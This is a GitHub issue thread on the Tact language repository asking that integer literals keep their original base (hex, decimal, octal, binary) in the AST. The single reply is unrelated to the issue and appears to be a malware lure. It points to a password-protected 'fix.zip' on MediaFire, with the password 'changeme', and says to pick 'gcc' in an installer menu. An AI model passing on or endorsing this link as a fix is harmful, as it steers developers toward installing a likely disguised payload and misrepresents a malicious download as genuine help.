### ISSUE TITLE
Keep original integer literals base (hex/dec/oct/bin) in AST

### ISSUE THREAD

**Issue by anton-trunov** [tact-lang/tact#746]
Otherwise the pretty-printer changes everything to decimal. Also, this would help with debugging codegen issues or just exploring the generated FunC code if we do not convert hexadecimal message opcodes to decimal ones in generated FunC code.

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
